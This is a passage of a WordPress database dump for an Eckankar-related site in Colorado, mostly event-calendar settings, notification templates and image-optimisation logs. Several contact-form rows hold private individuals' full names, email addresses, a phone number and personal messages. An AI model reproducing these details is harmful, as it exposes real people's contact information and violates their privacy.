/>\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(150717,265920,'passster_activate_global_protection',NULL),(150718,265920,'passster_activate_protection',NULL),(150719,265920,'passster_protection_type','password'),(150720,265920,'_dp_original','265919'),(150721,265920,'_edit_lock','1636500308:2'),(150722,265920,'_edit_last','2'),(150723,265922,'protect_children',''),(151748,266078,'mec_start_day_seconds','54000'),(150725,265922,'mec_color',''),(150726,265922,'mec_location_id','129'),(150727,265922,'mec_dont_show_map','0'),(150728,265922,'mec_organizer_id','1'),(150729,265922,'mec_read_more',''),(150730,265922,'mec_more_info',''),(150731,265922,'mec_more_info_title',''),(150732,265922,'mec_more_info_target','_self'),(150733,265922,'mec_cost',''),(150734,265922,'mec_currency','a:0:{}'),(150735,265922,'mec_additional_organizer_ids','a:0:{}'),(150736,265922,'mec_additional_location_ids','a:0:{}'),(150737,265922,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-07\";s:4:\"hour\";s:1:\"9\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-07\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"15\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(150738,265922,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(150739,265922,'mec_certain_weekdays','a:0:{}'),(150740,265922,'mec_allday','0'),(150741,265922,'one_occurrence','0'),(150742,265922,'mec_hide_time','0'),(150743,265922,'mec_hide_end_time','0'),(150744,265922,'mec_comment',''),(150745,265922,'mec_timezone','global'),(150746,265922,'mec_countdown_method','global'),(150747,265922,'mec_public','1'),(150748,265922,'mec_start_date','2021-11-07'),(150749,265922,'mec_start_time_hour','9'),(150750,265922,'mec_start_time_minutes','0'),(150751,265922,'mec_start_time_ampm','AM'),(150752,265922,'mec_start_day_seconds','32400'),(150753,265922,'mec_end_date','2021-11-07'),(150754,265922,'mec_end_time_hour','10'),(150755,265922,'mec_end_time_minutes','15'),(150756,265922,'mec_end_time_ampm','AM'),(150757,265922,'mec_end_day_seconds','36900'),(150758,265922,'mec_repeat_status','1'),(150759,265922,'mec_repeat_type','advanced'),(150760,265922,'mec_repeat_interval','1'),(150761,265922,'mec_repeat_end','occurrences'),(150762,265922,'mec_repeat_end_at_occurrences','11'),(150763,265922,'mec_repeat_end_at_date','2021-10-17'),(150764,265922,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.1\";}'),(150765,265922,'mec_in_days',''),(150766,265922,'mec_not_in_days',''),(150767,265922,'mec_hourly_schedules','a:0:{}'),(150768,265922,'mec_booking','a:0:{}'),(150769,265922,'mec_tickets','a:0:{}'),(150770,265922,'mec_fees_global_inheritance','1'),(150771,265922,'mec_fees','a:0:{}'),(150772,265922,'mec_ticket_variations_global_inheritance','1'),(150773,265922,'mec_ticket_variations','a:0:{}'),(150774,265922,'mec_reg_fields_global_inheritance','1'),(150775,265922,'mec_reg_fields','a:0:{}'),(150776,265922,'mec_bfixed_fields','a:0:{}'),(150777,265922,'mec_op','a:0:{}'),(150778,265922,'mec_fields','a:0:{}'),(150779,265922,'mec_event_status','EventScheduled'),(150780,265922,'mec_moved_online_link',''),(150781,265922,'mec_cancelled_reason',''),(150782,265922,'mec_display_cancellation_reason_in_single_page',''),(150783,265922,'boldgrid_hide_page_title','0'),(150784,265922,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(150785,265922,'passster_activate_global_protection',NULL),(150786,265922,'passster_activate_protection',NULL),(150787,265922,'passster_protection_type','password'),(150788,265922,'_dp_original','265919'),(150789,265922,'_edit_lock','1646239711:2'),(150790,265922,'_edit_last','2'),(169110,267185,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(169109,267185,'mec_hourly_schedules','a:0:{}'),(154362,266281,'_menu_item_object','page'),(154363,266281,'_menu_item_target',''),(154364,266281,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(154365,266281,'_menu_item_xfn',''),(154366,266281,'_menu_item_url',''),(179317,266281,'_menu_sgpb_popup_id','0'),(154411,266282,'_seq_num','1'),(154359,266281,'_menu_item_type','post_type'),(154360,266281,'_menu_item_menu_item_parent','247332'),(154361,266281,'_menu_item_object_id','266277'),(154358,266281,'protect_children',''),(179345,268204,'smush-info','The file was compressed from 60.10 KB to 15.81 KB saving 73.7 percent using WP-Optimize'),(179337,268201,'original-file','2023/03/newsletter-lg-1-updraft-pre-smush-original.png'),(179338,268201,'smush-complete','1'),(154331,247332,'_wp_old_date','2021-10-16'),(177216,267955,'mec_all_dates','a:0:{}'),(177217,267955,'mec_other_dates','a:0:{}'),(154321,247345,'_wp_old_date','2021-10-16'),(154317,247344,'_wp_old_date','2021-10-16'),(154315,247343,'_wp_old_date','2021-10-16'),(154313,261921,'_wp_old_date','2021-10-16'),(154311,247342,'_wp_old_date','2021-10-16'),(154305,264901,'_wp_old_date','2021-10-16'),(154303,264902,'_wp_old_date','2021-10-16'),(154301,264903,'_wp_old_date','2021-10-16'),(154236,266270,'_seq_num','38'),(154235,266270,'_form_id','46'),(154234,266270,'_field_427','helainer@comcast.net'),(154233,266270,'_field_426','Reiner'),(154214,266266,'_field_229','a:2:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";i:1;s:8:\"Loveland\";}'),(154215,266266,'_form_id','21'),(154216,266266,'_seq_num','144'),(154217,266267,'_field_425','Lexi'),(154218,266267,'_field_426','Massey'),(154219,266267,'_field_427','AlexaReevesMassey@gmail.com'),(154220,266267,'_form_id','46'),(154221,266267,'_seq_num','35'),(154222,266268,'_field_425','Robert'),(154223,266268,'_field_426','Bell'),(154224,266268,'_field_427','robertscottbell@GMAIL.COM'),(154225,266268,'_form_id','46'),(154226,266268,'_seq_num','36'),(154227,266269,'_field_425','Helaine'),(154228,266269,'_field_426','Reiner '),(154229,266269,'_field_427','helainer@comcast.net'),(154230,266269,'_form_id','46'),(154231,266269,'_seq_num','37'),(154232,266270,'_field_425','Helaine'),(154213,266266,'_field_228','US'),(154212,266266,'_field_227','CO'),(154211,266266,'_field_226','avor.gj@gmail.com'),(154210,266266,'_field_225','Gibson'),(169108,267185,'mec_not_in_days',''),(169107,267185,'mec_in_days',''),(169106,267185,'mec_advanced_days','a:0:{}'),(169105,267185,'mec_repeat_end_at_date',''),(169104,267185,'mec_repeat_end_at_occurrences',''),(169103,267185,'mec_repeat_end',''),(150891,265929,'_field_450','Richard'),(150892,265929,'_field_451','Grazewski'),(150893,265929,'_field_458','4022095850'),(150894,265929,'_field_452','rgrazewski@gmail.com'),(150895,265929,'_field_453','location'),(150896,265929,'_field_454','Please remove your loveland adress from the web I now am located where you where o licoln ave'),(150897,265929,'_form_id','49'),(150898,265929,'_seq_num','4'),(150899,265930,'_wp_attached_file','2021/11/RESA-Org-Chart-10.01.21.pdf'),(150900,261549,'passster_activate_global_protection',NULL),(150901,261549,'passster_activate_protection',NULL),(150902,261549,'passster_protection_type','password'),(150903,265902,'original-file','2021/11/orange-path-walking-2-updraft-pre-smush-original.jpg'),(150904,265902,'smush-complete','1'),(150905,265902,'smush-info','The file was compressed from 53.12 KB to 50.40 KB saving 5.12 percent using WP-Optimize'),(150906,265902,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:54395;s:12:\"smushed-size\";i:51609;s:15:\"savings-percent\";d:5.12000000000000010658141036401502788066864013671875;}'),(159671,266548,'_field_135','w.bellz@wavetec.net'),(159672,266548,'_field_137','Where in Bible, Jesus himself claimed to be God or Son of God?'),(159670,266548,'_field_134','bellz'),(150909,265875,'original-file','2021/11/star-bridge-updraft-pre-smush-original.jpg'),(150910,265875,'smush-complete','1'),(150911,265875,'smush-info','The file was compressed from 35.69 KB to 34.56 KB saving 3.17 percent using WP-Optimize'),(150912,265875,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:36544;s:12:\"smushed-size\";i:35387;s:15:\"savings-percent\";d:3.1699999999999999289457264239899814128875732421875;}'),(150913,265930,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2021/11/RESA-Org-Chart-10.01.21.pdf - cannot be optimized, it has an invalid file type'),(150914,265930,'smush-complete',''),(151118,266035,'mec_end_date','2021-12-05'),(151119,266035,'mec_end_time_hour','11'),(151120,266035,'mec_end_time_minutes','30'),(151121,266035,'mec_end_time_ampm','AM'),(151122,266035,'mec_end_day_seconds','41400'),(151123,266035,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-12-05\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-12-05\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(151124,266035,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(151125,266035,'mec_certain_weekdays','a:0:{}'),(151126,266035,'mec_allday','0'),(151127,266035,'mec_hide_time','0'),(151128,266035,'mec_hide_end_time','0'),(151129,266035,'mec_comment',''),(151130,266035,'mec_repeat_status','0'),(151131,266035,'mec_repeat_type',''),(151132,266035,'mec_repeat_interval','1'),(151133,266035,'mec_repeat_end',''),(151134,266035,'mec_repeat_end_at_occurrences',''),(151135,266035,'mec_repeat_end_at_date',''),(151136,266035,'mec_advanced_days','a:0:{}'),(151137,266035,'mec_in_days',''),(151138,266035,'mec_not_in_days',''),(151139,266035,'mec_hourly_schedules','a:0:{}'),(151140,266035,'mec_booking','a:0:{}'),(151141,266035,'mec_tickets','a:0:{}'),(151142,266035,'mec_fees_global_inheritance','1'),(151143,266035,'mec_fees','a:0:{}'),(151144,266035,'mec_ticket_variations_global_inheritance','1'),(151145,266035,'mec_ticket_variations','a:0:{}'),(151146,266035,'mec_reg_fields_global_inheritance','1'),(151147,266035,'mec_reg_fields','a:0:{}'),(151148,266035,'mec_op','a:0:{}'),(151149,266035,'mec_event_date_submit','20210422105713'),(151150,266035,'_thumbnail_id','266036'),(151151,266035,'mec_read_more',''),(151152,266035,'mec_more_info',''),(151153,266035,'mec_more_info_title',''),(151154,266035,'mec_more_info_target','_self'),(151155,266035,'mec_cost',''),(151156,266035,'mec_currency','a:0:{}'),(151157,266035,'mec_additional_organizer_ids','a:0:{}'),(151158,266035,'mec_additional_location_ids','a:0:{}'),(151159,266035,'one_occurrence','0'),(151160,266035,'mec_timezone','global'),(151161,266035,'mec_countdown_method','global'),(151162,266035,'mec_public','1'),(151163,266035,'mec_bfixed_fields','a:0:{}'),(151164,266035,'mec_fields','a:0:{}'),(151165,266035,'mec_event_status','EventScheduled'),(151166,266035,'mec_moved_online_link',''),(151167,266035,'mec_cancelled_reason',''),(151168,266035,'mec_display_cancellation_reason_in_single_page',''),(151169,266035,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(151170,266035,'passster_activate_global_protection',NULL),(151171,266035,'passster_activate_protection',NULL),(151172,266035,'passster_protection_type','password'),(151173,266035,'_dp_original','265425'),(151174,266035,'_edit_lock','1637775442:2'),(151175,266035,'_edit_last','2'),(151176,266036,'_wp_attached_file','2021/11/hu-wooden-1.jpg'),(151177,266036,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:576;s:6:\"height\";i:324;s:4:\"file\";s:23:\"2021/11/hu-wooden-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"hu-wooden-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"hu-wooden-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:23:\"hu-wooden-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:23:\"hu-wooden-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:23:\"hu-wooden-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:23:\"hu-wooden-1-300x324.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"hu-wooden-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(151300,266042,'mec_repeat_status','0'),(151301,266042,'mec_repeat_type',''),(151302,266042,'mec_repeat_interval','1'),(151303,266042,'mec_repeat_end',''),(151304,266042,'mec_repeat_end_at_occurrences',''),(151305,266042,'mec_repeat_end_at_date',''),(151306,266042,'mec_advanced_days','a:0:{}'),(151307,266042,'mec_in_days',''),(151308,266042,'mec_not_in_days',''),(151309,266042,'mec_hourly_schedules','a:0:{}'),(151310,266042,'mec_booking','a:0:{}'),(151311,266042,'mec_tickets','a:0:{}'),(151312,266042,'mec_fees_global_inheritance','1'),(151313,266042,'mec_fees','a:0:{}'),(151314,266042,'mec_ticket_variations_global_inheritance','1'),(151315,266042,'mec_ticket_variations','a:0:{}'),(151316,266042,'mec_reg_fields_global_inheritance','1'),(151317,266042,'mec_reg_fields','a:0:{}'),(151318,266042,'mec_bfixed_fields','a:0:{}'),(151319,266042,'mec_op','a:0:{}'),(151320,266042,'mec_fields','a:0:{}'),(151321,266042,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(151322,266042,'mec_event_status','EventScheduled'),(151323,266042,'mec_moved_online_link',''),(151324,266042,'mec_cancelled_reason',''),(151325,266042,'mec_display_cancellation_reason_in_single_page',''),(151326,266042,'protect_children',''),(151327,266042,'passster_activate_global_protection',NULL),(151328,266042,'passster_activate_protection',NULL),(151329,266042,'passster_protection_type','password'),(151330,266042,'boldgrid_hide_page_title','0'),(151331,266042,'_thumbnail_id','265138'),(151333,266042,'_dp_original','266041'),(151334,266042,'_edit_lock','1640982605:2'),(151335,266042,'_edit_last','2'),(151336,266044,'_field_224','Rebazar'),(151337,266044,'_field_225','Allembe'),(151338,266044,'_field_226','hospiceallembe@gmail.com'),(151339,266044,'_field_227','WA'),(151340,266044,'_field_228','US'),(151341,266044,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(151342,266044,'_form_id','21'),(151343,266044,'_seq_num','138'),(151344,266045,'_field_224','Judith'),(151345,266045,'_field_225','Parrish'),(151346,266045,'_field_226','parrishtravel@gmail.com'),(151347,266045,'_field_227','CO'),(151348,266045,'_field_228','US'),(151349,266045,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(151350,266045,'_form_id','21'),(151351,266045,'_seq_num','139'),(151352,266046,'_field_362','Steve'),(151353,266046,'_field_363','Brown'),(151354,266046,'_field_370','970731'),(151355,266046,'_field_364','stevecsb111@outlook.com'),(151356,266046,'_field_365','Request Information on local chapter in Pagosa Springs'),(151357,266046,'_field_366','Same as above'),(151358,266046,'_form_id','39'),(151359,266046,'_seq_num','3'),(152355,266118,'_form_id','44'),(152353,266118,'_field_403','Piraber'),(152354,266118,'_field_404','piravfildor@gmail.com'),(152352,266118,'_field_402','Fil D\'Or'),(151381,266052,'_field_133','Kayla'),(151382,266052,'_field_134','MacLean'),(151383,266052,'_field_135','macleankayla@gmail.com'),(151384,266052,'_field_137','New member '),(151385,266052,'_field_138','Hello ,\nI am wondering if I can attend dec 5 teaching? I’ve never been before but have been wanting to. Do I need to become a member or just show up for the 10:30 teaching tomorrow in Lakewood?\n\nKindly\nKayla'),(151386,266052,'_form_id','13'),(151387,266052,'_seq_num','91'),(151388,266053,'protect_children',''),(151389,266053,'mec_color',''),(151390,266053,'mec_location_id','118'),(151391,266053,'mec_dont_show_map','0'),(151392,266053,'mec_organizer_id','1'),(151393,266053,'mec_read_more',''),(151394,266053,'mec_more_info',''),(151395,266053,'mec_more_info_title',''),(151396,266053,'mec_more_info_target','_self'),(151397,266053,'mec_cost',''),(151398,266053,'mec_currency','a:0:{}'),(151399,266053,'mec_additional_organizer_ids','a:0:{}'),(151400,266053,'mec_additional_location_ids','a:0:{}'),(151401,266053,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-12-12\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-12-12\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(151402,266053,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(151403,266053,'mec_certain_weekdays','a:0:{}'),(151404,266053,'mec_allday','0'),(151405,266053,'one_occurrence','0'),(151406,266053,'mec_hide_time','0'),(151407,266053,'mec_hide_end_time','0'),(151408,266053,'mec_comment',''),(151409,266053,'mec_timezone','global'),(151410,266053,'mec_countdown_method','global'),(151411,266053,'mec_public','1'),(151412,266053,'mec_start_date','2021-12-12'),(151413,266053,'mec_start_time_hour','10'),(151414,266053,'mec_start_time_minutes','30'),(151415,266053,'mec_start_time_ampm','AM'),(151416,266053,'mec_start_day_seconds','37800'),(151417,266053,'mec_end_date','2021-12-12'),(151418,266053,'mec_end_time_hour','11'),(151419,266053,'mec_end_time_minutes','30'),(151420,266053,'mec_end_time_ampm','AM'),(151421,266053,'mec_end_day_seconds','41400'),(151422,266053,'mec_repeat_status','0'),(151423,266053,'mec_repeat_type',''),(151424,266053,'mec_repeat_interval','1'),(151425,266053,'mec_repeat_end',''),(151426,266053,'mec_repeat_end_at_occurrences',''),(151427,266053,'mec_repeat_end_at_date',''),(151428,266053,'mec_advanced_days','a:0:{}'),(151429,266053,'mec_in_days',''),(151430,266053,'mec_not_in_days',''),(151431,266053,'mec_hourly_schedules','a:0:{}'),(151432,266053,'mec_booking','a:0:{}'),(151433,266053,'mec_tickets','a:0:{}'),(151434,266053,'mec_fees_global_inheritance','1'),(151435,266053,'mec_fees','a:0:{}'),(151436,266053,'mec_ticket_variations_global_inheritance','1'),(151437,266053,'mec_ticket_variations','a:0:{}'),(151438,266053,'mec_reg_fields_global_inheritance','1'),(151439,266053,'mec_reg_fields','a:0:{}'),(151440,266053,'mec_bfixed_fields','a:0:{}'),(151441,266053,'mec_op','a:0:{}'),(151442,266053,'mec_fields','a:0:{}'),(151443,266053,'mec_event_status','EventScheduled'),(151444,266053,'mec_moved_online_link',''),(151445,266053,'mec_cancelled_reason',''),(151446,266053,'mec_display_cancellation_reason_in_single_page',''),(151447,266053,'boldgrid_hide_page_title','0'),(151448,266053,'_thumbnail_id','265875'),(151449,266053,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(151450,266053,'passster_activate_global_protection',NULL),(151451,266053,'passster_activate_protection',NULL),(151452,266053,'passster_protection_type','password'),(151453,266053,'sg_popup_target_custom','a:1:{i:0;s:6:\"264857\";}'),(151454,266053,'sgpb_popup_events_custom','a:1:{i:264857;a:1:{i:0;s:5:\"click\";}}'),(151455,266053,'_dp_original','264605'),(151456,266053,'_edit_lock','1638719307:2'),(151457,266053,'_edit_last','2'),(151458,266055,'protect_children',''),(151459,266055,'_field_425','Chris'),(151460,266055,'_field_426','name'),(151461,266055,'_field_427','choll.03@comcast.net'),(151462,266055,'_form_id','46'),(151463,266055,'_seq_num','29'),(151464,266056,'mec_color',''),(151465,266056,'mec_location_id','122'),(151466,266056,'mec_dont_show_map','0'),(151467,266056,'mec_organizer_id','1'),(151468,266056,'mec_read_more',''),(151469,266056,'mec_more_info',''),(151470,266056,'mec_more_info_title',''),(151471,266056,'mec_more_info_target','_self'),(151472,266056,'mec_cost',''),(151473,266056,'mec_currency','a:0:{}'),(151474,266056,'mec_additional_organizer_ids','a:0:{}'),(151475,266056,'mec_additional_location_ids','a:0:{}'),(151476,266056,'mec_date','a:4:{s:5: